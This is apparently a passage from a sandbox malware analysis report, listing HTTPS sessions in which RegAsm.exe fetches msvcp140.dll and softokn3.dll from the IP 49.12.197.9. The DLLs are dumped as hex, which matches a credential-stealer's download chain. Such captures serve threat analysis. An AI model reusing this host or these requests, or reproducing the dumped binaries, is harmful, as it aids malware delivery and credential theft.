EPzEPWxP1`PHP$,FM1R'^_[]00L9tc
2024-10-02 07:41:52 UTC	16384	IN	Data Raw: e9 06 89 c8 ba cd cc cc cc f7 e2 c1 ea 02 83 e2 fe 8d 04 92 29 c1 80 c9 30 8b 06 88 4c 18 03 b9 59 17 b7 d1 89 f8 f7 e1 89 d1 c1 e9 0d 89 c8 ba cd cc cc cc f7 e2 c1 ea 02 83 e2 fe 8d 04 92 29 c1 80 c9 30 8b 06 88 4c 18 02 89 f8 c1 e8 05 b9 c5 5a 7c 0a f7 e1 89 d1 c1 e9 07 bb ff 00 00 00 89 c8 21 d8 69 c0 cd 00 00 00 c1 e8 0a 83 e0 fe 8d 04 80 28 c1 80 c9 30 ba 83 de 1b 43 89 f8 f7 e2 8b 06 8b 7d 08 88 4c 38 01 c1 ea 12 89 d0 21 d8 69 c0 cd 00 00 00 c1 e8 0a 83 e0 fe 8d 04 80 28 c2 80 ca 30 89 f1 8b 06 8b 75 08 88 14 06 8b 39 8d 47 07 89 01 83 c7 0d b9 cd cc cc cc 8b 75 ec 89 f0 f7 e1 89 d1 c1 e9 03 8d 04 09 8d 04 80 89 f3 29 c3 80 cb 30 89 c8 ba cd cc cc cc f7 e2 8b 45 08 88 1c 38 89 c3 c1 ea 02 83 e2 fe 8d 04 92 29 c1 80 c9 30 8b 7d 0c 8b 07 88 4c 18 05 Data Ascii: )0LY)0LZ\|!i(0C}L8!i(0u9Gu)0E8)0}L
2024-10-02 07:41:52 UTC	16384	IN	Data Raw: 00 83 c4 04 89 45 f0 8b 06 8b 4e 04 85 c9 0f 8e b3 00 00 00 31 c9 8d 14 08 83 c2 0c f2 0f 10 42 f4 8b 5d f0 f2 0f 11 04 0b 8b 7a fc c7 42 fc 00 00 00 00 89 7c 0b 08 8b 1e 8b 7e 04 8d 3c 7f 8d 3c bb 83 c1 0c 39 fa 72 cd e9 81 00 00 00 8b 06 8d 0c 49 8d 0c 88 89 4d f0 31 d2 8d 1c 10 83 c3 0c f2 0f 10 43 f4 f2 0f 11 04 17 8b 4b fc c7 43 fc 00 00 00 00 89 4c 17 08 83 c2 0c 3b 5d f0 72 da 8b 46 04 85 c0 0f 8e 02 ff ff ff 8b 1e 8d 04 40 8d 04 83 89 45 f0 8b 43 08 c7 43 08 00 00 00 00 85 c0 74 09 50 e8 ec 52 01 00 83 c4 04 83 c3 0c 3b 5d f0 0f 83 d4 fe ff ff eb db 31 c0 40 89 45 ec e9 27 ff ff ff 8d 0c 49 8d 3c 88 89 c3 39 fb 73 20 8b 43 08 c7 43 08 00 00 00 00 85 c0 74 09 50 e8 b0 52 01 00 83 c4 04 83 c3 0c 39 fb 72 e2 8b 1e 53 e8 9e 52 01 00 83 c4 04 8b 45 f0 Data Ascii: EN1B]zB\|~<<9rIM1CKCL;]rF@ECCtPR;]1@E'I<9s CCtPR9rSRE
2024-10-02 07:41:52 UTC	16384	IN	Data Raw: e9 42 fd ff ff 8b 48 fc 83 c0 fc 29 c8 83 f8 20 73 1b 89 c8 e9 b3 fe ff ff 8b 48 fc 83 c0 fc 29 c8 83 f8 20 73 07 89 c8 e9 c2 fe ff ff ff 15 b0 bf 08 10 cc cc cc cc 55 89 e5 57 56 89 ce 8b 79 20 85 ff 74 28 f0 ff 4f 38 75 22 8b 4f 14 83 f9 10 73 5f c7 47 10 00 00 00 00 c7 47 14 0f 00 00 00 c6 07 00 57 e8 2d 13 01 00 83 c4 04 8b 7e 18 c7 46 18 00 00 00 00 85 ff 74 1c 8b 07 85 c0 74 0d 50 ff 15 04 be 08 10 c7 07 00 00 00 00 57 e8 03 13 01 00 83 c4 04 8b 46 08 85 c0 75 2f 8b 46 04 85 c0 74 09 50 e8 ec 12 01 00 83 c4 04 5e 5f 5d c3 8b 07 81 c1 01 f0 ff ff 81 f9 ff ef ff ff 76 20 50 e8 cf 12 01 00 83 c4 04 eb 86 c7 05 f4 f8 08 10 1a 2b 08 10 cc b9 18 00 00 00 e8 0d 80 02 00 8b 48 fc 83 c0 fc 29 c8 83 f8 20 73 04 89 c8 eb cf ff 15 b0 bf 08 10 cc cc cc cc cc cc Data Ascii: BH) sH) sUWVy t(O8u"Os_GGW-~FttPWFu/FtP^_]v P+H) s
2024-10-02 07:41:52 UTC	16384	IN	Data Raw: 04 00 00 85 db 0f 85 ad 07 00 00 c7 44 24 30 00 00 00 00 c7 44 24 34 07 00 00 00 66 c7 44 24 20 00 00 57 e8 e1 37 06 00 83 c4 04 89 c6 83 f8 07 8b 5c 24 04 0f 87 4b 03 00 00 8d 44 24 20 89 70 10 89 f1 01 f1 51 57 50 e8 fe 37 06 00 83 c4 0c 66 c7 44 74 20 00 00 8b 44 24 30 8b 4c 24 34 89 ca 29 c2 83 fa 11 0f 82 fd 05 00 00 8d 50 11 89 54 24 30 83 f9 08 72 06 8b 4c 24 20 eb 04 8d 4c 24 20 0f b7 15 de 4d 08 10 66 89 54 41 20 0f 10 05 ce 4d 08 10 0f 11 44 41 10 0f 10 05 be 4d 08 10 0f 11 04 41 66 c7 44 41 22 00 00 bf 10 00 00 00 57 e8 60 3e 00 00 83 c4 04 89 c6 8b 45 0c f2 0f 10 40 20 f2 0f 11 06 f2 0f 10 40 28 f2 0f 11 46 08 83 7c 24 34 08 72 06 8b 44 24 20 eb 04 8d 44 24 20 57 56 6a 03 6a 00 50 53 ff 15 2c e3 08 10 89 c3 56 e8 9e d2 00 00 83 c4 04 8b 4c 24 Data Ascii: D$0D$4fD$ W7\$KD$ pQWP7fDt D$0L$4)PT$0rL$ L$ MfTA MDAMAfDA"W`>E@ @(F\|$4rD$ D$ WVjjPS,VL$
2024-10-02 07:41:52 UTC	16384	IN	Data Raw: 81 8b b8 08 00 00 00 85 ff 0f 84 0b 06 00 00 83 fb 08 0f 86 cc 02 00 00 83 c3 0f 89 d8 83 e0 f0 89 44 24 1c c1 eb 04 c1 e3 05 8d 34 1f 83 c6 50 80 7f 3c 00 89 7c 24 10 89 5c 24 18 74 0a 83 7f 40 00 0f 84 29 06 00 00 8d 47 0c 89 44 24 20 50 ff 15 30 be 08 10 8b 16 85 d2 0f 84 38 01 00 00 83 7a 08 00 0f 84 2e 01 00 00 8b 4a 04 8b 74 8a 0c 85 f6 0f 84 eb 01 00 00 8b 5f 40 85 db 75 60 0f bc fe 89 cb c1 e3 05 09 fb 0f bb fe 8b 7c 24 10 8b 44 24 18 0f af 5c 07 58 8b 44 07 68 89 74 8a 0c 01 d0 01 c3 83 42 08 ff 85 db 0f 84 a2 05 00 00 8b 44 24 1c 01 47 2c ff 74 24 20 ff 15 b0 be 08 10 85 db 0f 84 93 05 00 00 8b 4c 24 60 31 e9 e8 51 e7 01 00 89 d8 8d 65 f4 5e 5f 5b 5d c3 89 4c 24 04 89 54 24 14 8b 0b 8b 7b 04 89 3c 24 0f a4 cf 17 89 c8 c1 e0 17 31 c8 8b 53 0c 33 Data Ascii: D$4P<\|$\$t@)GD$ P08z.Jt_@u`\|$D$\XDhtBD$G,t$ L$`1Qe^_[]L$T${<$1S3
2024-10-02 07:41:52 UTC	16384	IN	Data Raw: 0b 83 e1 fe 83 e0 01 09 c8 89 42 04 89 13 8d 44 24 58 e9 75 ff ff ff c7 44 24 3c 00 00 00 00 8b 5c 24 04 e9 a5 fe ff ff 31 d2 a8 10 0f 44 54 24 18 31 c9 39 f2 0f 97 c0 0f 82 e1 fe ff ff 88 c1 e9 d5 fe ff ff b0 01 e9 ec fd ff ff 8b 46 04 83 f8 01 0f 87 13 01 00 00 89 f2 8b 06 31 c9 85 c0 8b 74 24 1c 0f 84 39 04 00 00 8b 48 04 83 e1 fe 89 0a 89 d1 83 e1 fe 89 54 24 04 8b 50 04 83 e2 01 09 ca 89 50 04 8b 54 24 04 8b 52 04 83 e2 01 09 ca 89 50 04 8b 4c 24 04 80 49 04 01 83 60 04 01 89 c1 e9 fb 03 00 00 c7 44 24 28 00 00 00 00 e9 f9 fd ff ff 8d 74 24 54 89 f1 e8 37 0b fe ff 8b 1e e9 47 ff ff ff 83 e3 fe 89 58 04 89 d6 8b 1a 85 db 0f 84 fb 01 00 00 8b 43 04 83 e0 fe 89 06 89 f0 83 e0 fe 8b 4b 04 83 e1 01 09 c1 89 4b 04 8b 4e 04 89 c8 83 e0 fe 0f 84 c0 01 00 00 Data Ascii: BD$XuD$<\$1DT$19F1t$9HT$PPT$RPL$I`D$(t$T7GXCKKN
2024-10-02 07:41:52 UTC	16384	IN	Data Raw: 10 b9 00 00 00 00 0f 44 4c 24 04 31 db 39 c1 0f 97 c1 72 d1 88 cb 8b 50 04 83 e2 fe eb cc 83 e3 fe 89 1a 89 d6 83 e6 fe 8b 18 8b 48 04 83 e1 01 09 f1 89 48 04 85 db 0f 84 8d 0a 00 00 80 63 04 fe 8b 74 24 14 39 16 75 07 89 06 e9 69 ff ff ff 83 e0 fe 8b 56 04 83 e2 01 8d 0c 02 89 4e 04 85 c0 0f 84 25 0a 00 00 8b 08 83 e1 fe 09 d1 89 4e 04 89 30 8b 4e 04 83 e1 01 8b 50 04 83 e2 fe 09 ca 89 50 04 80 4e 04 01 85 ff 0f 84 1f 0a 00 00 39 37 0f 84 a0 05 00 00 e9 e0 05 00 00 8b 4c 24 1c 8b 19 89 d9 ba 00 f0 ff ff 21 d1 8b 70 08 21 d6 31 d2 39 f1 0f 97 c2 b9 ff ff ff ff 0f 42 d1 85 d2 0f 85 59 05 00 00 e9 c0 05 00 00 89 c1 85 d2 0f 85 c2 fe ff ff 8b 54 24 04 c7 02 00 00 00 00 8b 4c 24 08 c7 44 b1 14 01 00 00 00 83 fb 01 0f 84 17 02 00 00 89 10 8b 54 24 20 8b 44 24 Data Ascii: DL$19rPHHct$9uiVN%N0NPPN97L$!p!19BYT$L$DT$ D$

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
32	192.168.2.4	49785	49.12.197.9	443	5164	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Timestamp	Bytes transferred	Direction	Data
2024-10-02 07:41:54 UTC	196	OUT	GET /msvcp140.dll HTTP/1.1 User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0 Host: 49.12.197.9 Connection: Keep-Alive Cache-Control: no-cache
2024-10-02 07:41:54 UTC	263	IN	HTTP/1.1 200 OK Server: nginx Date: Wed, 02 Oct 2024 07:41:54 GMT Content-Type: application/octet-stream Content-Length: 450024 Connection: close Last-Modified: Wednesday, 02-Oct-2024 07:41:54 GMT Cache-Control: no-store, no-cache Accept-Ranges: bytes
2024-10-02 07:41:54 UTC	16121	IN	Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 d9 93 31 43 9d f2 5f 10 9d f2 5f 10 9d f2 5f 10 29 6e b0 10 9f f2 5f 10 94 8a cc 10 8b f2 5f 10 9d f2 5e 10 22 f2 5f 10 cf 9a 5e 11 9e f2 5f 10 cf 9a 5c 11 95 f2 5f 10 cf 9a 5b 11 d3 f2 5f 10 cf 9a 5a 11 d1 f2 5f 10 cf 9a 5f 11 9c f2 5f 10 cf 9a a0 10 9c f2 5f 10 cf 9a 5d 11 9c f2 5f 10 52 69 63 68 9d f2 5f 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii: MZ@!L!This program cannot be run in DOS mode.$1C___)n__^"_^_\_[_Z____]_Rich_
2024-10-02 07:41:54 UTC	16384	IN	Data Raw: 00 72 00 2d 00 62 00 61 00 00 00 68 00 72 00 2d 00 68 00 72 00 00 00 68 00 75 00 2d 00 68 00 75 00 00 00 68 00 79 00 2d 00 61 00 6d 00 00 00 69 00 64 00 2d 00 69 00 64 00 00 00 69 00 73 00 2d 00 69 00 73 00 00 00 69 00 74 00 2d 00 63 00 68 00 00 00 69 00 74 00 2d 00 69 00 74 00 00 00 6a 00 61 00 2d 00 6a 00 70 00 00 00 6b 00 61 00 2d 00 67 00 65 00 00 00 6b 00 6b 00 2d 00 6b 00 7a 00 00 00 6b 00 6e 00 2d 00 69 00 6e 00 00 00 6b 00 6f 00 2d 00 6b 00 72 00 00 00 6b 00 6f 00 6b 00 2d 00 69 00 6e 00 00 00 00 00 6b 00 79 00 2d 00 6b 00 67 00 00 00 6c 00 74 00 2d 00 6c 00 74 00 00 00 6c 00 76 00 2d 00 6c 00 76 00 00 00 6d 00 69 00 2d 00 6e 00 7a 00 00 00 6d 00 6b 00 2d 00 6d 00 6b 00 00 00 6d 00 6c 00 2d 00 69 00 6e 00 00 00 6d 00 6e 00 2d 00 6d 00 6e 00 00 00 Data Ascii: r-bahr-hrhu-huhy-amid-idis-isit-chit-itja-jpka-gekk-kzkn-inko-krkok-inky-kglt-ltlv-lvmi-nzmk-mkml-inmn-mn
2024-10-02 07:41:54 UTC	16384	IN	Data Raw: 00 00 00 04 00 00 00 04 8b 00 10 18 8b 00 10 78 8a 00 10 e8 7b 00 10 04 7c 00 10 00 00 00 00 d8 4c 06 10 03 00 00 00 00 00 00 00 ff ff ff ff 00 00 00 00 40 00 00 00 f4 8a 00 10 00 00 00 00 01 00 00 00 04 00 00 00 44 8b 00 10 58 8b 00 10 a0 7d 00 10 30 7d 00 10 dc 7d 00 10 00 00 00 00 14 4d 06 10 03 00 00 00 00 00 00 00 ff ff ff ff 00 00 00 00 40 00 00 00 34 8b 00 10 00 00 00 00 01 00 00 00 04 00 00 00 84 8b 00 10 98 8b 00 10 a0 7d 00 10 30 7d 00 10 dc 7d 00 10 00 00 00 00 34 4d 06 10 03 00 00 00 00 00 00 00 ff ff ff ff 00 00 00 00 40 00 00 00 74 8b 00 10 00 00 00 00 00 00 00 00 00 00 00 00 58 4d 06 10 c8 8b 00 10 00 00 00 00 01 00 00 00 04 00 00 00 d8 8b 00 10 ec 8b 00 10 a0 7d 00 10 30 7d 00 10 dc 7d 00 10 00 00 00 00 58 4d 06 10 03 00 00 00 00 00 00 00 Data Ascii: x{\|L@DX}0}}M@4}0}}4M@tXM}0}}XM
2024-10-02 07:41:54 UTC	16384	IN	Data Raw: 18 d9 00 0f bf 45 fc d9 5d e8 d9 45 10 d9 45 e8 d9 c0 89 45 f4 de ea d9 c9 d9 5d e8 d9 45 e8 d9 55 10 d9 ee da e9 df e0 f6 c4 44 7b 05 dd d8 d9 45 10 8d 45 ec 50 8d 45 f8 50 d9 5d ec e8 fc fa ff ff 59 59 3b f3 0f 8c aa fd ff ff eb 10 8d 4e 01 d9 1c b7 3b cb 7d 06 d9 ee d9 5c b7 04 5e 8b c7 5f 5b c9 c3 55 8b ec 51 56 33 f6 39 75 14 7e 37 d9 ee 57 8b 7d 10 d9 04 b7 d9 5d fc d9 45 fc dd e1 df e0 dd d9 f6 c4 44 7b 1a 51 d9 1c 24 ff 75 0c ff 75 08 e8 97 fc ff ff d9 ee 83 c4 0c 46 3b 75 14 7c d2 dd d8 5f 8b 45 08 5e c9 c3 55 8b ec 51 51 8b 4d 0c 85 c9 75 04 d9 ee c9 c3 8b 55 08 83 f9 01 0f 84 9d 00 00 00 d9 02 d9 5d fc d9 45 fc d9 ee dd e1 df e0 f6 c4 44 0f 8b 82 00 00 00 d9 42 04 d9 5d fc d9 45 fc dd e1 df e0 f6 c4 44 7b 6e 83 f9 02 74 5d d9 42 08 d9 5d fc d9 Data Ascii: E]EEE]EUD{EEPEP]YY;N;}\^_[UQV39u~7W}]ED{Q$uuF;u\|_E^UQQMuU]EDB]ED{nt]B]
2024-10-02 07:41:54 UTC	16384	IN	Data Raw: 6a 03 f7 0f b7 06 83 f8 61 74 05 83 f8 41 75 0f 03 f7 0f b7 06 66 3b c1 74 0e 66 3b c2 74 09 8b 45 08 33 db 8b 30 eb 43 03 f7 6a 04 5b 89 75 f8 66 83 3e 28 89 5d f4 75 32 8b de 03 df 68 07 01 00 00 0f b7 03 50 ff 15 ac 72 06 10 59 59 85 c0 75 e9 0f b7 03 83 f8 5f 74 e1 89 5d f8 8b 5d f4 83 f8 29 75 06 8b 75 f8 83 c6 02 8b 45 0c 85 c0 74 02 89 30 8b 45 08 5f 89 30 8b c3 5e 5b c9 c3 55 8b ec 83 ec 48 a1 c0 41 06 10 33 c5 89 45 fc 6b 4d 18 07 33 d2 8b 45 10 53 8b 5d 14 56 8b 75 0c 89 75 d0 89 45 b8 89 55 bc 89 55 c4 89 55 c0 89 4d cc 57 8b fa 83 f9 23 7e 06 6a 23 59 89 4d cc 6a 30 58 89 13 89 53 04 66 39 06 75 12 c7 45 c4 01 00 00 00 83 c6 02 66 39 06 74 f8 89 75 d0 0f b7 0e b8 b8 2d 00 10 89 4d c8 8b 4d cc c7 45 d4 16 00 00 00 8b 75 c8 66 39 30 8b 75 d0 74 Data Ascii: jatAuf;tf;tE30Cj[uf>(]u2hPrYYu_t]])uuEt0E_0^[UHA3EkM3ES]VuuEUUUMW#~j#YMj0XSf9uEf9tu-MMEuf90ut
2024-10-02 07:41:54 UTC	16384	IN	Data Raw: 85 c0 75 03 8d 41 1c c3 cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc 55 8b ec 6a ff 68 09 e7 03 10 64 a1 00 00 00 00 50 a1 c0 41 06 10 33 c5 50 8d 45 f4 64 a3 00 00 00 00 e8 79 7b 00 00 50 e8 71 d8 ff ff 59 8b 40 0c 8b 4d f4 64 89 0d 00 00 00 00 59 c9 c3 cc cc 55 8b ec 83 79 38 00 8b 45 08 75 03 83 c8 04 ff 75 0c 50 e8 28 00 00 00 5d c2 08 00 cc cc cc cc 55 8b ec 6a 00 ff 75 08 e8 13 00 00 00 5d c2 04 00 cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc 55 8b ec 8b 45 08 83 ec 1c 83 e0 17 89 41 0c 8b 49 10 56 23 c8 74 43 80 7d 0c 00 75 42 f6 c1 04 74 07 be 78 54 00 10 eb 0f be 90 54 00 10 f6 c1 02 75 05 be a8 54 00 10 8d 45 f8 6a 01 50 e8 f7 13 00 00 59 59 50 56 8d 4d e4 e8 bc e2 ff ff 68 a4 1a 04 10 8d 45 e4 50 eb 09 5e c9 c2 08 00 6a 00 6a 00 e8 f0 93 02 00 Data Ascii: uAUjhdPA3PEdy{PqY@MdYUy8EuuP(]Uju]UEAIV#tC}uBtxTTuTEjPYYPVMhEP^jj
2024-10-02 07:41:54 UTC	16384	IN	Data Raw: f0 51 56 89 45 fc 89 5f 10 e8 bd 54 02 00 8b 45 f8 83 c4 10 c6 04 1e 00 83 f8 10 72 0b 40 50 ff 37 e8 54 95 ff ff 59 59 89 37 8b c7 5f 5e 5b c9 c2 0c 00 e8 b3 be ff ff cc 55 8b ec 83 ec 0c 8b 55 08 b8 ff ff ff 7f 53 8b d9 56 57 8b 4b 10 2b c1 89 4d fc 3b c2 72 69 8b 43 14 8d 3c 11 57 8b cb 89 45 f4 e8 88 b1 ff ff 8b f0 8d 4e 01 51 e8 b2 94 ff ff 59 ff 75 18 89 7b 10 8d 4d 0c ff 75 14 8b 7d f4 89 45 f8 89 73 14 ff 75 10 ff 75 fc 83 ff 10 72 17 8b 33 56 50 e8 6b 03 00 00 8d 47 01 50 56 e8 d2 94 ff ff 59 59 eb 07 53 50 e8 56 03 00 00 8b 45 f8 5f 89 03 8b c3 5e 5b c9 c2 14 00 e8 25 be ff ff cc 55 8b ec 83 ec 10 8b 55 08 b8 ff ff ff 7f 53 8b d9 56 57 8b 4b 10 2b c1 89 4d f0 3b c2 0f 82 8f 00 00 00 8b 43 14 8d 3c 11 57 8b cb 89 45 fc e8 f6 b0 ff ff 8b f0 8d 4e Data Ascii: QVE_TEr@P7TYY7_^[UUSVWK+M;riC<WENQYu{Mu}Esuur3VPkGPVYYSPVE_^[%UUSVWK+M;C<WEN
2024-10-02 07:41:54 UTC	16384	IN	Data Raw: e8 83 fe 01 75 04 3b d7 74 3a 8b 5d 08 6a 04 59 89 4d d4 53 33 c0 03 04 cb 52 13 7c cb 04 56 57 50 e8 f1 02 02 00 5b 8b 5d 08 8b f9 8b 4d d4 8b 75 d8 89 54 cb 04 8b 55 e8 89 04 cb 83 e9 01 89 4d d4 79 cf 5f 5e 5b c9 c3 55 8b ec 51 56 8b 75 14 33 d2 85 f6 7e 5f 53 8b 5d 08 29 5d 10 57 8b fb 89 75 fc 8b 5d 10 8b 0c 3b 03 0f 8b 44 3b 04 13 47 04 03 ca 89 0f 8d 7f 08 83 d0 00 8b d0 89 57 fc 83 67 fc 00 83 ee 01 75 dc 0b c6 8b 5d 08 74 22 8b 4d fc 3b 4d 0c 7d 1a 01 14 cb 8b 54 cb 04 13 d6 33 f6 89 54 cb 04 8b c2 21 74 cb 04 41 0b c6 75 e1 5f 5b 5e c9 c3 55 8b ec 8b 55 08 56 8b 75 0c 83 c2 f8 8d 14 f2 8b 02 0b 42 04 75 0b 8d 52 f8 4e 8b 0a 0b 4a 04 74 f5 8b c6 5e 5d c3 55 8b ec 53 56 33 db 33 f6 39 5d 0c 7e 30 57 8b 7d 08 ff 75 14 ff 75 10 ff 74 f7 04 ff 34 f7 Data Ascii: u;t:]jYMS3R\|VWP[]MuTUMy_^[UQVu3~_S])]Wu];D;GWgu]t"M;M}T3T!tAu_[^UUVuBuRNJt^]USV339]~0W}uut4
2024-10-02 07:41:54 UTC	16384	IN	Data Raw: cc cc cc cc cc cc cc 55 8b ec 51 8b 45 0c 56 8b f1 89 75 fc 89 46 04 c7 06 7c 69 00 10 83 66 08 00 ff 15 d0 72 06 10 6a 00 89 46 08 ff 15 90 71 06 10 59 8b c6 5e c9 c2 08 00 cc cc cc cc cc cc cc cc cc cc cc cc cc 55 8b ec 51 8b 45 0c 56 8b f1 89 75 fc 89 46 04 c7 06 e8 65 00 10 83 66 08 00 ff 15 d0 72 06 10 6a 00 89 46 08 ff 15 90 71 06 10 59 8b c6 5e c9 c2 08 00 56 8b f1 ff 76 0c c7 06 4c 68 00 10 ff 15 90 71 06 10 59 c7 06 28 52 00 10 5e c3 56 8b f1 ff 76 0c c7 06 8c 66 00 10 ff 15 90 71 06 10 59 c7 06 28 52 00 10 5e c3 cc cc cc cc cc cc cc 56 8b f1 c7 06 50 69 00 10 e8 e2 71 00 00 c7 06 28 52 00 10 5e c3 cc cc cc cc cc cc cc cc cc cc 56 8b f1 c7 06 90 67 00 10 e8 c2 71 00 00 c7 06 28 52 00 10 5e c3 cc cc cc cc cc cc cc cc cc cc 56 8b f1 ff 76 08 c7 06 Data Ascii: UQEVuF\|ifrjFqY^UQEVuFefrjFqY^VvLhqY(R^VvfqY(R^VPiq(R^Vgq(R^Vv
2024-10-02 07:41:54 UTC	16384	IN	Data Raw: f6 e8 97 73 00 00 84 c0 0f 85 d3 00 00 00 8b 5d ec 80 7f 04 00 75 07 8b cf e8 85 26 00 00 0f b7 47 06 50 ff b5 74 ff ff ff e8 9a a8 ff ff 59 59 83 f8 0a 73 3c 8a 80 2c 6a 00 10 8b 4d 8c 88 85 64 ff ff ff ff b5 64 ff ff ff e8 5f 18 ff ff 8b 4d d8 8d 45 d8 83 fb 10 72 02 8b c1 80 3c 30 7f 74 4c 8d 45 d8 83 fb 10 72 02 8b c1 fe 04 30 eb 3a 8d 45 d8 83 fb 10 72 03 8b 45 d8 80 3c 30 00 74 45 80 7f 04 00 0f b7 47 06 75 0b 8b cf e8 10 26 00 00 0f b7 47 06 66 3b 85 60 ff ff ff 75 27 6a 00 8d 4d d8 e8 04 18 ff ff 46 8b 5d ec 8b cf e8 24 11 00 00 ff 75 98 8b cf e8 de 72 00 00 84 c0 0f 84 4a ff ff ff 8b 5d 90 85 f6 74 13 83 7d ec 10 8d 45 d8 72 03 8b 45 d8 80 3c 30 00 7e 52 46 8a 45 a7 83 7d d4 10 8d 55 c0 72 03 8b 55 c0 84 c0 75 49 85 f6 74 5e 8a 0a 80 f9 7f 74 57 Data Ascii: s]u&GPtYYs<,jMdd_MEr<0tLEr0:ErE<0tEGu&Gf;`u'jMF]$urJ]t}ErE<0~RFE}UrUuIt^tW

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
33	192.168.2.4	49787	49.12.197.9	443	5164	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Timestamp	Bytes transferred	Direction	Data
2024-10-02 07:41:55 UTC	196	OUT	GET /softokn3.dll HTTP/1.1 User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0 Host: 49.12.197.9 Connection: Keep-Alive Cache-Control: no-cache
2024-10-02 07:41:56 UTC	263	IN	HTTP/1.1 200 OK Server: nginx Date: Wed, 02 Oct 2024 07:41:55 GMT Content-Type: application/octet-stream Content-Length: 257872 Connection: close Last-Modified: Wednesday, 02-Oct-2024 07:41:55 GMT Cache-Control: no-store, no-cache Accept-Ranges: bytes
2024-10-02 07:41:56 UTC	16121	IN	Data Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 06 00 f3 34 12 63 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 00 00 cc 02 00 00 f0 00 00 00 00 00 00 50 cf 02 00 00 10 00 00 00 00 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 00 04 00 00 04 00 00 53 67 04 00 02 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 44 76 03 00 53 01 00 00 97 77 03 00 f0 00 00 Data Ascii: MZx@x!L!This program cannot be run in DOS mode.$PEL4c"!PSg@ADvSw
2024-10-02 07:41:56 UTC	16384	IN	Data Raw: 7d 08 c7 85 f0 fe ff ff 00 00 00 00 8d 85 ec fe ff ff 89 85 f4 fe ff ff c7 85 f8 fe ff ff 04 00 00 00 8d 85 f0 fe ff ff 6a 01 50 53 57 e8 85 af 00 00 83 c4 10 89 c6 85 c0 75 3f 8b 85 ec fe ff ff 83 c0 fd 83 f8 01 77 25 be 30 00 00 00 83 3d 28 9a 03 10 00 75 23 83 3d 50 90 03 10 00 74 0e be 01 01 00 00 f6 05 20 9a 03 10 01 74 0c 53 57 e8 e2 b9 00 00 83 c4 08 89 c6 83 3d 2c 9a 03 10 00 0f 84 5e ff ff ff 8b 85 ec fe ff ff 83 c0 fe 83 f8 02 0f 87 4c ff ff ff 56 53 57 68 85 6b 03 10 68 00 01 00 00 8d 85 f0 fe ff ff 50 ff 15 1c 7c 03 10 83 c4 18 e9 2a ff ff ff cc cc cc cc cc cc cc cc cc cc cc cc 55 89 e5 53 57 56 81 ec 08 01 00 00 a1 14 90 03 10 31 e8 89 45 f0 c7 85 ec fe ff ff 00 00 00 00 be 30 00 00 00 83 3d 28 9a 03 10 00 74 17 8b 4d f0 31 e9 e8 28 8b 02 00 Data Ascii: }jPSWu?w%0=(u#=Pt tSW=,^LVSWhkhP\|*USWV1E0=(tM1(
2024-10-02 07:41:56 UTC	16384	IN	Data Raw: 8b 40 04 03 45 dc 56 8d 4d ec 51 50 57 e8 55 9e ff ff 83 c4 10 85 c0 0f 85 6b 03 00 00 57 e8 c4 9d ff ff 83 c4 04 ff 75 e8 53 57 e8 f7 9d ff ff 83 c4 0c ff 75 e8 8d 45 e8 50 53 57 e8 26 9e ff ff 83 c4 10 85 c0 0f 85 3c 03 00 00 8b 4d c8 83 c1 01 8b 75 e4 8b 45 dc 01 f0 3b 4d c0 0f 85 6c ff ff ff 31 f6 e9 20 03 00 00 31 f6 ff 35 30 9a 03 10 ff 15 f0 7b 03 10 83 c4 04 a1 34 9a 03 10 85 c0 74 15 6a 01 50 e8 57 4e 02 00 83 c4 08 c7 05 34 9a 03 10 00 00 00 00 a1 38 9a 03 10 85 c0 74 15 6a 01 50 e8 39 4e 02 00 83 c4 08 c7 05 38 9a 03 10 00 00 00 00 a1 3c 9a 03 10 85 c0 74 15 6a 01 50 e8 1b 4e 02 00 83 c4 08 c7 05 3c 9a 03 10 00 00 00 00 56 e8 e8 4d 02 00 83 c4 04 a3 34 9a 03 10 8b 47 38 a3 40 9a 03 10 8b 47 28 a3 44 9a 03 10 8b 47 2c a3 48 9a 03 10 8d 47 04 50 Data Ascii: @EVMQPWUkWuSWuEPSW&<MuE;Ml1 150{4tjPWN48tjP9N8<tjPN<VM4G8@G(DG,HGP
